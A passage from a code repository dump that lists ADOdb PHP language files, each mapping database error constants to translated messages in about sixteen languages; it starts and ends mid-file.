DB_ERROR_CONSTRAINT => '约束限制', 12 | DB_ERROR_DIVZERO => '被0除', 13 | DB_ERROR_INVALID => '无效', 14 | DB_ERROR_INVALID_DATE => '无效的日期或者时间', 15 | DB_ERROR_INVALID_NUMBER => '无效的数字', 16 | DB_ERROR_MISMATCH => '不匹配', 17 | DB_ERROR_NODBSELECTED => '没有数据库被选择', 18 | DB_ERROR_NOSUCHFIELD => '没有相应的字段', 19 | DB_ERROR_NOSUCHTABLE => '没有相应的表', 20 | DB_ERROR_NOT_CAPABLE => '数据库后台不兼容', 21 | DB_ERROR_NOT_FOUND => '没有发现', 22 | DB_ERROR_NOT_LOCKED => '没有被锁定', 23 | DB_ERROR_SYNTAX => '语法错误', 24 | DB_ERROR_UNSUPPORTED => '不支持', 25 | DB_ERROR_VALUE_COUNT_ON_ROW => '在行上累计值', 26 | DB_ERROR_INVALID_DSN => '无效的数据源 (DSN)', 27 | DB_ERROR_CONNECT_FAILED => '连接失败', 28 | 0 => '没有错误', // DB_OK 29 | DB_ERROR_NEED_MORE_DATA => '提供的数据不能符合要求', 30 | DB_ERROR_EXTENSION_NOT_FOUND=> '扩展没有被发现', 31 | DB_ERROR_NOSUCHDB => '没有相应的数据库', 32 | DB_ERROR_ACCESS_VIOLATION => '没有合适的权限' 33 | ); 34 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-cz.inc.php: -------------------------------------------------------------------------------- 1 | 5 | 6 | $ADODB_LANG_ARRAY = array ( 7 | 'LANG' => 'cz', 8 | DB_ERROR => 'neznámá chyba', 9 | DB_ERROR_ALREADY_EXISTS => 'ji? existuje', 10 | DB_ERROR_CANNOT_CREATE => 'nelze vytvo?it', 11 | DB_ERROR_CANNOT_DELETE => 'nelze smazat', 12 | DB_ERROR_CANNOT_DROP => 'nelze odstranit', 13 | DB_ERROR_CONSTRAINT => 'poru?ení omezující podmínky', 14 | DB_ERROR_DIVZERO => 'd?lení nulou', 15 | DB_ERROR_INVALID => 'neplatné', 16 | DB_ERROR_INVALID_DATE => 'neplatné datum nebo ?as', 17 | DB_ERROR_INVALID_NUMBER => 'neplatné ?íslo', 18 | DB_ERROR_MISMATCH => 'nesouhlasí', 19 | DB_ERROR_NODBSELECTED => '?ádná databáze není vybrána', 20 | DB_ERROR_NOSUCHFIELD => 'pole nenalezeno', 21 | DB_ERROR_NOSUCHTABLE => 'tabulka nenalezena', 22 | DB_ERROR_NOT_CAPABLE => 'nepodporováno', 23 | DB_ERROR_NOT_FOUND => 'nenalezeno', 24 | DB_ERROR_NOT_LOCKED => 'nezam?eno', 25 | DB_ERROR_SYNTAX => 'syntaktická chyba', 26 | DB_ERROR_UNSUPPORTED => 'nepodporováno', 27 | DB_ERROR_VALUE_COUNT_ON_ROW => '', 28 | DB_ERROR_INVALID_DSN => 'neplatné DSN', 29 | DB_ERROR_CONNECT_FAILED => 'p?ipojení selhalo', 30 | 0 => 'bez chyb', // DB_OK 31 | DB_ERROR_NEED_MORE_DATA => 'málo zdrojových dat', 32 | DB_ERROR_EXTENSION_NOT_FOUND=> 'roz?í?ení nenalezeno', 33 | DB_ERROR_NOSUCHDB => 'databáze neexistuje', 34 | DB_ERROR_ACCESS_VIOLATION => 'nedostate?ná práva' 35 | ); 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-da.inc.php: -------------------------------------------------------------------------------- 1 | 'da', 5 | DB_ERROR => 'ukendt fejl', 6 | DB_ERROR_ALREADY_EXISTS => 'eksisterer allerede', 7 | DB_ERROR_CANNOT_CREATE => 'kan ikke oprette', 8 | DB_ERROR_CANNOT_DELETE => 'kan ikke slette', 9 | DB_ERROR_CANNOT_DROP => 'kan ikke droppe', 10 | DB_ERROR_CONSTRAINT => 'begrænsning krænket', 11 | DB_ERROR_DIVZERO => 'division med nul', 12 | DB_ERROR_INVALID => 'ugyldig', 13 | DB_ERROR_INVALID_DATE => 'ugyldig dato eller klokkeslet', 14 | DB_ERROR_INVALID_NUMBER => 'ugyldigt tal', 15 | DB_ERROR_MISMATCH => 'mismatch', 16 | DB_ERROR_NODBSELECTED => 'ingen database valgt', 17 | DB_ERROR_NOSUCHFIELD => 'felt findes ikke', 18 | DB_ERROR_NOSUCHTABLE => 'tabel findes ikke', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend opgav', 20 | DB_ERROR_NOT_FOUND => 'ikke fundet', 21 | DB_ERROR_NOT_LOCKED => 'ikke låst', 22 | DB_ERROR_SYNTAX => 'syntaksfejl', 23 | DB_ERROR_UNSUPPORTED => 'ikke understøttet', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'resulterende antal felter svarer ikke til forespørgslens antal felter', 25 | DB_ERROR_INVALID_DSN => 'ugyldig DSN', 26 | DB_ERROR_CONNECT_FAILED => 'tilslutning mislykkedes', 27 | 0 => 'ingen fejl', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'utilstrækkelige data angivet', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'udvidelse ikke fundet', 30 | DB_ERROR_NOSUCHDB => 'database ikke fundet', 31 | DB_ERROR_ACCESS_VIOLATION => 'utilstrækkelige rettigheder' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-en.inc.php: -------------------------------------------------------------------------------- 1 | 'en', 5 | DB_ERROR => 'unknown error', 6 | DB_ERROR_ALREADY_EXISTS => 'already exists', 7 | DB_ERROR_CANNOT_CREATE => 'can not create', 8 | DB_ERROR_CANNOT_DELETE => 'can not delete', 9 | DB_ERROR_CANNOT_DROP => 'can not drop', 10 | DB_ERROR_CONSTRAINT => 'constraint violation', 11 | DB_ERROR_DIVZERO => 'division by zero', 12 | DB_ERROR_INVALID => 'invalid', 13 | DB_ERROR_INVALID_DATE => 'invalid date or time', 14 | DB_ERROR_INVALID_NUMBER => 'invalid number', 15 | DB_ERROR_MISMATCH => 'mismatch', 16 | DB_ERROR_NODBSELECTED => 'no database selected', 17 | DB_ERROR_NOSUCHFIELD => 'no such field', 18 | DB_ERROR_NOSUCHTABLE => 'no such table', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend not capable', 20 | DB_ERROR_NOT_FOUND => 'not found', 21 | DB_ERROR_NOT_LOCKED => 'not locked', 22 | DB_ERROR_SYNTAX => 'syntax error', 23 | DB_ERROR_UNSUPPORTED => 'not supported', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'value count on row', 25 | DB_ERROR_INVALID_DSN => 'invalid DSN', 26 | DB_ERROR_CONNECT_FAILED => 'connect failed', 27 | 0 => 'no error', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'insufficient data supplied', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension not found', 30 | DB_ERROR_NOSUCHDB => 'no such database', 31 | DB_ERROR_ACCESS_VIOLATION => 'insufficient permissions', 32 | DB_ERROR_DEADLOCK => 'deadlock detected', 33 | DB_ERROR_STATEMENT_TIMEOUT => 'statement timeout', 34 | DB_ERROR_SERIALIZATION_FAILURE => 'could not serialize access' 35 | ); 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-eo.inc.php: -------------------------------------------------------------------------------- 1 | 'eo', 7 | DB_ERROR => 'nekonata eraro', 8 | DB_ERROR_ALREADY_EXISTS => 'jam ekzistas', 9 | DB_ERROR_CANNOT_CREATE => 'maleblas krei', 10 | DB_ERROR_CANNOT_DELETE => 'maleblas elimini', 11 | DB_ERROR_CANNOT_DROP => 'maleblas elimini (drop)', 12 | DB_ERROR_CONSTRAINT => 'rompo de kondiĉoj de provo', 13 | DB_ERROR_DIVZERO => 'divido per 0 (nul)', 14 | DB_ERROR_INVALID => 'malregule', 15 | DB_ERROR_INVALID_DATE => 'malregula dato kaj tempo', 16 | DB_ERROR_INVALID_NUMBER => 'malregula nombro', 17 | DB_ERROR_MISMATCH => 'eraro', 18 | DB_ERROR_NODBSELECTED => 'datumbazo ne elektita', 19 | DB_ERROR_NOSUCHFIELD => 'ne ekzistas kampo', 20 | DB_ERROR_NOSUCHTABLE => 'ne ekzistas tabelo', 21 | DB_ERROR_NOT_CAPABLE => 'DBMS ne povas', 22 | DB_ERROR_NOT_FOUND => 'ne trovita', 23 | DB_ERROR_NOT_LOCKED => 'ne blokita', 24 | DB_ERROR_SYNTAX => 'sintaksa eraro', 25 | DB_ERROR_UNSUPPORTED => 'ne apogata', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'nombrilo de valoroj en linio', 27 | DB_ERROR_INVALID_DSN => 'malregula DSN-o', 28 | DB_ERROR_CONNECT_FAILED => 'konekto malsukcesa', 29 | 0 => 'ĉio bone', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'ne sufiĉe da datumo', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'etendo ne trovita', 32 | DB_ERROR_NOSUCHDB => 'datumbazo ne ekzistas', 33 | DB_ERROR_ACCESS_VIOLATION => 'ne sufiĉe da rajto por atingo' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-es.inc.php: -------------------------------------------------------------------------------- 1 | 3 | $ADODB_LANG_ARRAY = array ( 4 | 'LANG' => 'es', 5 | DB_ERROR => 'error desconocido', 6 | DB_ERROR_ALREADY_EXISTS => 'ya existe', 7 | DB_ERROR_CANNOT_CREATE => 'imposible crear', 8 | DB_ERROR_CANNOT_DELETE => 'imposible borrar', 9 | DB_ERROR_CANNOT_DROP => 'imposible hacer drop', 10 | DB_ERROR_CONSTRAINT => 'violacion de constraint', 11 | DB_ERROR_DIVZERO => 'division por cero', 12 | DB_ERROR_INVALID => 'invalido', 13 | DB_ERROR_INVALID_DATE => 'fecha u hora invalida', 14 | DB_ERROR_INVALID_NUMBER => 'numero invalido', 15 | DB_ERROR_MISMATCH => 'error', 16 | DB_ERROR_NODBSELECTED => 'no hay base de datos seleccionada', 17 | DB_ERROR_NOSUCHFIELD => 'campo invalido', 18 | DB_ERROR_NOSUCHTABLE => 'tabla no existe', 19 | DB_ERROR_NOT_CAPABLE => 'capacidad invalida para esta DB', 20 | DB_ERROR_NOT_FOUND => 'no encontrado', 21 | DB_ERROR_NOT_LOCKED => 'no bloqueado', 22 | DB_ERROR_SYNTAX => 'error de sintaxis', 23 | DB_ERROR_UNSUPPORTED => 'no soportado', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'la cantidad de columnas no corresponden a la cantidad de valores', 25 | DB_ERROR_INVALID_DSN => 'DSN invalido', 26 | DB_ERROR_CONNECT_FAILED => 'fallo la conexion', 27 | 0 => 'sin error', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'insuficientes datos', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension no encontrada', 30 | DB_ERROR_NOSUCHDB => 'base de datos no encontrada', 31 | DB_ERROR_ACCESS_VIOLATION => 'permisos insuficientes' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-fa.inc.php: -------------------------------------------------------------------------------- 1 | */ 4 | 5 | $ADODB_LANG_ARRAY = array ( 6 | 'LANG' => 'fa', 7 | DB_ERROR => 'خطای ناشناخته', 8 | DB_ERROR_ALREADY_EXISTS => 'وجود دارد', 9 | DB_ERROR_CANNOT_CREATE => 'امکان create وجود ندارد', 10 | DB_ERROR_CANNOT_DELETE => 'امکان حذف وجود ندارد', 11 | DB_ERROR_CANNOT_DROP => 'امکان drop وجود ندارد', 12 | DB_ERROR_CONSTRAINT => 'نقض شرط', 13 | DB_ERROR_DIVZERO => 'تقسیم بر صفر', 14 | DB_ERROR_INVALID => 'نامعتبر', 15 | DB_ERROR_INVALID_DATE => 'زمان یا تاریخ نامعتبر', 16 | DB_ERROR_INVALID_NUMBER => 'عدد نامعتبر', 17 | DB_ERROR_MISMATCH => 'عدم مطابقت', 18 | DB_ERROR_NODBSELECTED => 'بانک اطلاعاتی انتخاب نشده است', 19 | DB_ERROR_NOSUCHFIELD => 'چنین ستونی وجود ندارد', 20 | DB_ERROR_NOSUCHTABLE => 'چنین جدولی وجود ندارد', 21 | DB_ERROR_NOT_CAPABLE => 'backend بانک اطلاعاتی قادر نیست', 22 | DB_ERROR_NOT_FOUND => 'پیدا نشد', 23 | DB_ERROR_NOT_LOCKED => 'قفل نشده', 24 | DB_ERROR_SYNTAX => 'خطای دستوری', 25 | DB_ERROR_UNSUPPORTED => 'پشتیبانی نمی شود', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'شمارش مقادیر روی ردیف', 27 | DB_ERROR_INVALID_DSN => 'DSN نامعتبر', 28 | DB_ERROR_CONNECT_FAILED => 'ارتباط برقرار نشد', 29 | 0 => 'بدون خطا', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'داده ناکافی است', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension پیدا نشد', 32 | DB_ERROR_NOSUCHDB => 'چنین بانک اطلاعاتی وجود ندارد', 33 | DB_ERROR_ACCESS_VIOLATION => 'حق دسترسی ناکافی' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-fr.inc.php: -------------------------------------------------------------------------------- 1 | 'fr', 5 | DB_ERROR => 'erreur inconnue', 6 | DB_ERROR_ALREADY_EXISTS => 'existe déjà', 7 | DB_ERROR_CANNOT_CREATE => 'création impossible', 8 | DB_ERROR_CANNOT_DELETE => 'effacement impossible', 9 | DB_ERROR_CANNOT_DROP => 'suppression impossible', 10 | DB_ERROR_CONSTRAINT => 'violation de contrainte', 11 | DB_ERROR_DIVZERO => 'division par zéro', 12 | DB_ERROR_INVALID => 'invalide', 13 | DB_ERROR_INVALID_DATE => 'date ou heure invalide', 14 | DB_ERROR_INVALID_NUMBER => 'nombre invalide', 15 | DB_ERROR_MISMATCH => 'erreur de concordance', 16 | DB_ERROR_NODBSELECTED => 'pas de base de données sélectionnée', 17 | DB_ERROR_NOSUCHFIELD => 'nom de colonne invalide', 18 | DB_ERROR_NOSUCHTABLE => 'table ou vue inexistante', 19 | DB_ERROR_NOT_CAPABLE => 'fonction optionnelle non installée', 20 | DB_ERROR_NOT_FOUND => 'pas trouvé', 21 | DB_ERROR_NOT_LOCKED => 'non verrouillé', 22 | DB_ERROR_SYNTAX => 'erreur de syntaxe', 23 | DB_ERROR_UNSUPPORTED => 'non supporté', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'valeur insérée trop grande pour colonne', 25 | DB_ERROR_INVALID_DSN => 'DSN invalide', 26 | DB_ERROR_CONNECT_FAILED => 'échec à la connexion', 27 | 0 => "pas d'erreur", // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'données fournies insuffisantes', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extension non trouvée', 30 | DB_ERROR_NOSUCHDB => 'base de données inconnue', 31 | DB_ERROR_ACCESS_VIOLATION => 'droits insuffisants' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-hu.inc.php: -------------------------------------------------------------------------------- 1 | 4 | $ADODB_LANG_ARRAY = array ( 5 | 'LANG' => 'hu', 6 | DB_ERROR => 'ismeretlen hiba', 7 | DB_ERROR_ALREADY_EXISTS => 'már létezik', 8 | DB_ERROR_CANNOT_CREATE => 'nem sikerült létrehozni', 9 | DB_ERROR_CANNOT_DELETE => 'nem sikerült törölni', 10 | DB_ERROR_CANNOT_DROP => 'nem sikerült eldobni', 11 | DB_ERROR_CONSTRAINT => 'szabályok megszegése', 12 | DB_ERROR_DIVZERO => 'osztás nullával', 13 | DB_ERROR_INVALID => 'érvénytelen', 14 | DB_ERROR_INVALID_DATE => 'érvénytelen dátum vagy idő', 15 | DB_ERROR_INVALID_NUMBER => 'érvénytelen szám', 16 | DB_ERROR_MISMATCH => 'nem megfelelő', 17 | DB_ERROR_NODBSELECTED => 'nincs kiválasztott adatbázis', 18 | DB_ERROR_NOSUCHFIELD => 'nincs ilyen mező', 19 | DB_ERROR_NOSUCHTABLE => 'nincs ilyen tábla', 20 | DB_ERROR_NOT_CAPABLE => 'DB backend nem támogatja', 21 | DB_ERROR_NOT_FOUND => 'nem található', 22 | DB_ERROR_NOT_LOCKED => 'nincs lezárva', 23 | DB_ERROR_SYNTAX => 'szintaktikai hiba', 24 | DB_ERROR_UNSUPPORTED => 'nem támogatott', 25 | DB_ERROR_VALUE_COUNT_ON_ROW => 'soron végzett érték számlálás', 26 | DB_ERROR_INVALID_DSN => 'hibás DSN', 27 | DB_ERROR_CONNECT_FAILED => 'sikertelen csatlakozás', 28 | 0 => 'nincs hiba', // DB_OK 29 | DB_ERROR_NEED_MORE_DATA => 'túl kevés az adat', 30 | DB_ERROR_EXTENSION_NOT_FOUND=> 'bővítmény nem található', 31 | DB_ERROR_NOSUCHDB => 'nincs ilyen adatbázis', 32 | DB_ERROR_ACCESS_VIOLATION => 'nincs jogosultság' 33 | ); 34 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-it.inc.php: -------------------------------------------------------------------------------- 1 | 'it', 6 | DB_ERROR => 'errore sconosciuto', 7 | DB_ERROR_ALREADY_EXISTS => 'esiste già', 8 | DB_ERROR_CANNOT_CREATE => 'non posso creare', 9 | DB_ERROR_CANNOT_DELETE => 'non posso cancellare', 10 | DB_ERROR_CANNOT_DROP => 'non posso eliminare', 11 | DB_ERROR_CONSTRAINT => 'violazione constraint', 12 | DB_ERROR_DIVZERO => 'divisione per zero', 13 | DB_ERROR_INVALID => 'non valido', 14 | DB_ERROR_INVALID_DATE => 'data od ora non valida', 15 | DB_ERROR_INVALID_NUMBER => 'numero non valido', 16 | DB_ERROR_MISMATCH => 'diversi', 17 | DB_ERROR_NODBSELECTED => 'nessun database selezionato', 18 | DB_ERROR_NOSUCHFIELD => 'nessun campo trovato', 19 | DB_ERROR_NOSUCHTABLE => 'nessuna tabella trovata', 20 | DB_ERROR_NOT_CAPABLE => 'DB backend non abilitato', 21 | DB_ERROR_NOT_FOUND => 'non trovato', 22 | DB_ERROR_NOT_LOCKED => 'non bloccato', 23 | DB_ERROR_SYNTAX => 'errore di sintassi', 24 | DB_ERROR_UNSUPPORTED => 'non supportato', 25 | DB_ERROR_VALUE_COUNT_ON_ROW => 'valore inserito troppo grande per una colonna', 26 | DB_ERROR_INVALID_DSN => 'DSN non valido', 27 | DB_ERROR_CONNECT_FAILED => 'connessione fallita', 28 | 0 => 'nessun errore', // DB_OK 29 | DB_ERROR_NEED_MORE_DATA => 'dati inseriti insufficienti', 30 | DB_ERROR_EXTENSION_NOT_FOUND=> 'estensione non trovata', 31 | DB_ERROR_NOSUCHDB => 'database non trovato', 32 | DB_ERROR_ACCESS_VIOLATION => 'permessi insufficienti' 33 | ); 34 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-nl.inc.php: -------------------------------------------------------------------------------- 1 | 'nl', 5 | DB_ERROR => 'onbekende fout', 6 | DB_ERROR_ALREADY_EXISTS => 'bestaat al', 7 | DB_ERROR_CANNOT_CREATE => 'kan niet aanmaken', 8 | DB_ERROR_CANNOT_DELETE => 'kan niet wissen', 9 | DB_ERROR_CANNOT_DROP => 'kan niet verwijderen', 10 | DB_ERROR_CONSTRAINT => 'constraint overtreding', 11 | DB_ERROR_DIVZERO => 'poging tot delen door nul', 12 | DB_ERROR_INVALID => 'ongeldig', 13 | DB_ERROR_INVALID_DATE => 'ongeldige datum of tijd', 14 | DB_ERROR_INVALID_NUMBER => 'ongeldig nummer', 15 | DB_ERROR_MISMATCH => 'is incorrect', 16 | DB_ERROR_NODBSELECTED => 'geen database geselecteerd', 17 | DB_ERROR_NOSUCHFIELD => 'onbekend veld', 18 | DB_ERROR_NOSUCHTABLE => 'onbekende tabel', 19 | DB_ERROR_NOT_CAPABLE => 'database systeem is niet tot uitvoer in staat', 20 | DB_ERROR_NOT_FOUND => 'niet gevonden', 21 | DB_ERROR_NOT_LOCKED => 'niet vergrendeld', 22 | DB_ERROR_SYNTAX => 'syntaxis fout', 23 | DB_ERROR_UNSUPPORTED => 'niet ondersteund', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'waarde telling op rij', 25 | DB_ERROR_INVALID_DSN => 'ongeldige DSN', 26 | DB_ERROR_CONNECT_FAILED => 'connectie mislukt', 27 | 0 => 'geen fout', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'onvoldoende data gegeven', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extensie niet gevonden', 30 | DB_ERROR_NOSUCHDB => 'onbekende database', 31 | DB_ERROR_ACCESS_VIOLATION => 'onvoldoende rechten' 32 | ); 33 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-pl.inc.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | $ADODB_LANG_ARRAY = array ( 6 | 'LANG' => 'pl', 7 | DB_ERROR => 'niezidentyfikowany błąd', 8 | DB_ERROR_ALREADY_EXISTS => 'już istnieją', 9 | DB_ERROR_CANNOT_CREATE => 'nie można stworzyć', 10 | DB_ERROR_CANNOT_DELETE => 'nie można usunąć', 11 | DB_ERROR_CANNOT_DROP => 'nie można porzucić', 12 | DB_ERROR_CONSTRAINT => 'pogwałcenie uprawnień', 13 | DB_ERROR_DIVZERO => 'dzielenie przez zero', 14 | DB_ERROR_INVALID => 'błędny', 15 | DB_ERROR_INVALID_DATE => 'błędna godzina lub data', 16 | DB_ERROR_INVALID_NUMBER => 'błędny numer', 17 | DB_ERROR_MISMATCH => 'niedopasowanie', 18 | DB_ERROR_NODBSELECTED => 'baza danych nie została wybrana', 19 | DB_ERROR_NOSUCHFIELD => 'nie znaleziono pola', 20 | DB_ERROR_NOSUCHTABLE => 'nie znaleziono tabeli', 21 | DB_ERROR_NOT_CAPABLE => 'nie zdolny', 22 | DB_ERROR_NOT_FOUND => 'nie znaleziono', 23 | DB_ERROR_NOT_LOCKED => 'nie zakmnięty', 24 | DB_ERROR_SYNTAX => 'błąd składni', 25 | DB_ERROR_UNSUPPORTED => 'nie obsługuje', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'wartość liczona w szeregu', 27 | DB_ERROR_INVALID_DSN => 'błędny DSN', 28 | DB_ERROR_CONNECT_FAILED => 'połączenie nie zostało zrealizowane', 29 | 0 => 'brak błędów', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'niedostateczna ilość informacji', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'nie znaleziono rozszerzenia', 32 | DB_ERROR_NOSUCHDB => 'nie znaleziono bazy', 33 | DB_ERROR_ACCESS_VIOLATION => 'niedostateczne uprawnienia' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-pt-br.inc.php: -------------------------------------------------------------------------------- 1 | 'pt-br', 6 | DB_ERROR => 'erro desconhecido', 7 | DB_ERROR_ALREADY_EXISTS => 'já existe', 8 | DB_ERROR_CANNOT_CREATE => 'impossível criar', 9 | DB_ERROR_CANNOT_DELETE => 'impossível excluír', 10 | DB_ERROR_CANNOT_DROP => 'impossível remover', 11 | DB_ERROR_CONSTRAINT => 'violação do confinamente', 12 | DB_ERROR_DIVZERO => 'divisão por zero', 13 | DB_ERROR_INVALID => 'inválido', 14 | DB_ERROR_INVALID_DATE => 'data ou hora inválida', 15 | DB_ERROR_INVALID_NUMBER => 'número inválido', 16 | DB_ERROR_MISMATCH => 'erro', 17 | DB_ERROR_NODBSELECTED => 'nenhum banco de dados selecionado', 18 | DB_ERROR_NOSUCHFIELD => 'campo inválido', 19 | DB_ERROR_NOSUCHTABLE => 'tabela inexistente', 20 | DB_ERROR_NOT_CAPABLE => 'capacidade inválida para este BD', 21 | DB_ERROR_NOT_FOUND => 'não encontrado', 22 | DB_ERROR_NOT_LOCKED => 'não bloqueado', 23 | DB_ERROR_SYNTAX => 'erro de sintaxe', 24 | DB_ERROR_UNSUPPORTED => 25 | 'não suportado', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'a quantidade de colunas não corresponde ao de valores', 27 | DB_ERROR_INVALID_DSN => 'DSN inválido', 28 | DB_ERROR_CONNECT_FAILED => 'falha na conexão', 29 | 0 => 'sem erro', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'dados insuficientes', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extensão não encontrada', 32 | DB_ERROR_NOSUCHDB => 'banco de dados não encontrado', 33 | DB_ERROR_ACCESS_VIOLATION => 'permissão insuficiente' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-ro.inc.php: -------------------------------------------------------------------------------- 1 | */ 4 | 5 | $ADODB_LANG_ARRAY = array ( 6 | 'LANG' => 'ro', 7 | DB_ERROR => 'eroare necunoscuta', 8 | DB_ERROR_ALREADY_EXISTS => 'deja exista', 9 | DB_ERROR_CANNOT_CREATE => 'nu se poate creea', 10 | DB_ERROR_CANNOT_DELETE => 'nu se poate sterge', 11 | DB_ERROR_CANNOT_DROP => 'nu se poate executa drop', 12 | DB_ERROR_CONSTRAINT => 'violare de constrain', 13 | DB_ERROR_DIVZERO => 'se divide la zero', 14 | DB_ERROR_INVALID => 'invalid', 15 | DB_ERROR_INVALID_DATE => 'data sau timp invalide', 16 | DB_ERROR_INVALID_NUMBER => 'numar invalid', 17 | DB_ERROR_MISMATCH => 'nepotrivire-mismatch', 18 | DB_ERROR_NODBSELECTED => 'nu exista baza de date selectata', 19 | DB_ERROR_NOSUCHFIELD => 'camp inexistent', 20 | DB_ERROR_NOSUCHTABLE => 'tabela inexistenta', 21 | DB_ERROR_NOT_CAPABLE => 'functie optionala neinstalata', 22 | DB_ERROR_NOT_FOUND => 'negasit', 23 | DB_ERROR_NOT_LOCKED => 'neblocat', 24 | DB_ERROR_SYNTAX => 'eroare de sintaxa', 25 | DB_ERROR_UNSUPPORTED => 'nu e suportat', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'valoare prea mare pentru coloana', 27 | DB_ERROR_INVALID_DSN => 'DSN invalid', 28 | DB_ERROR_CONNECT_FAILED => 'conectare esuata', 29 | 0 => 'fara eroare', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'data introduse insuficiente', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'extensie negasita', 32 | DB_ERROR_NOSUCHDB => 'nu exista baza de date', 33 | DB_ERROR_ACCESS_VIOLATION => 'permisiuni insuficiente' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-ru.inc.php: -------------------------------------------------------------------------------- 1 | 'ru', 7 | DB_ERROR => 'неизвестная ошибка', 8 | DB_ERROR_ALREADY_EXISTS => 'уже существует', 9 | DB_ERROR_CANNOT_CREATE => 'невозможно создать', 10 | DB_ERROR_CANNOT_DELETE => 'невозможно удалить', 11 | DB_ERROR_CANNOT_DROP => 'невозможно удалить (drop)', 12 | DB_ERROR_CONSTRAINT => 'нарушение условий проверки', 13 | DB_ERROR_DIVZERO => 'деление на 0', 14 | DB_ERROR_INVALID => 'неправильно', 15 | DB_ERROR_INVALID_DATE => 'некорректная дата или время', 16 | DB_ERROR_INVALID_NUMBER => 'некорректное число', 17 | DB_ERROR_MISMATCH => 'ошибка', 18 | DB_ERROR_NODBSELECTED => 'БД не выбрана', 19 | DB_ERROR_NOSUCHFIELD => 'не существует поле', 20 | DB_ERROR_NOSUCHTABLE => 'не существует таблица', 21 | DB_ERROR_NOT_CAPABLE => 'СУБД не в состоянии', 22 | DB_ERROR_NOT_FOUND => 'не найдено', 23 | DB_ERROR_NOT_LOCKED => 'не заблокировано', 24 | DB_ERROR_SYNTAX => 'синтаксическая ошибка', 25 | DB_ERROR_UNSUPPORTED => 'не поддерживается', 26 | DB_ERROR_VALUE_COUNT_ON_ROW => 'счетчик значений в строке', 27 | DB_ERROR_INVALID_DSN => 'неправильная DSN', 28 | DB_ERROR_CONNECT_FAILED => 'соединение неуспешно', 29 | 0 => 'нет ошибки', // DB_OK 30 | DB_ERROR_NEED_MORE_DATA => 'предоставлено недостаточно данных', 31 | DB_ERROR_EXTENSION_NOT_FOUND=> 'расширение не найдено', 32 | DB_ERROR_NOSUCHDB => 'не существует БД', 33 | DB_ERROR_ACCESS_VIOLATION => 'недостаточно прав доступа' 34 | ); 35 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/lang/adodb-sv.inc.php: -------------------------------------------------------------------------------- 1 | 'en', 5 | DB_ERROR => 'Okänt fel', 6 | DB_ERROR_ALREADY_EXISTS => 'finns redan', 7 | DB_ERROR_CANNOT_CREATE => 'kan inte skapa', 8 | DB_ERROR_CANNOT_DELETE => 'kan inte ta bort', 9 | DB_ERROR_CANNOT_DROP => 'kan inte släppa', 10 | DB_ERROR_CONSTRAINT => 'begränsning kränkt', 11 | DB_ERROR_DIVZERO => 'division med noll', 12 | DB_ERROR_INVALID => 'ogiltig', 13 | DB_ERROR_INVALID_DATE => 'ogiltigt datum eller tid', 14 | DB_ERROR_INVALID_NUMBER => 'ogiltigt tal', 15 | DB_ERROR_MISMATCH => 'felaktig matchning', 16 | DB_ERROR_NODBSELECTED => 'ingen databas vald', 17 | DB_ERROR_NOSUCHFIELD => 'inget sådant fält', 18 | DB_ERROR_NOSUCHTABLE => 'ingen sådan tabell', 19 | DB_ERROR_NOT_CAPABLE => 'DB backend klarar det inte', 20 | DB_ERROR_NOT_FOUND => 'finns inte', 21 | DB_ERROR_NOT_LOCKED => 'inte låst', 22 | DB_ERROR_SYNTAX => 'syntaxfel', 23 | DB_ERROR_UNSUPPORTED => 'stöds ej', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'värde räknat på rad', 25 | DB_ERROR_INVALID_DSN => 'ogiltig DSN', 26 | DB_ERROR_CONNECT_FAILED => 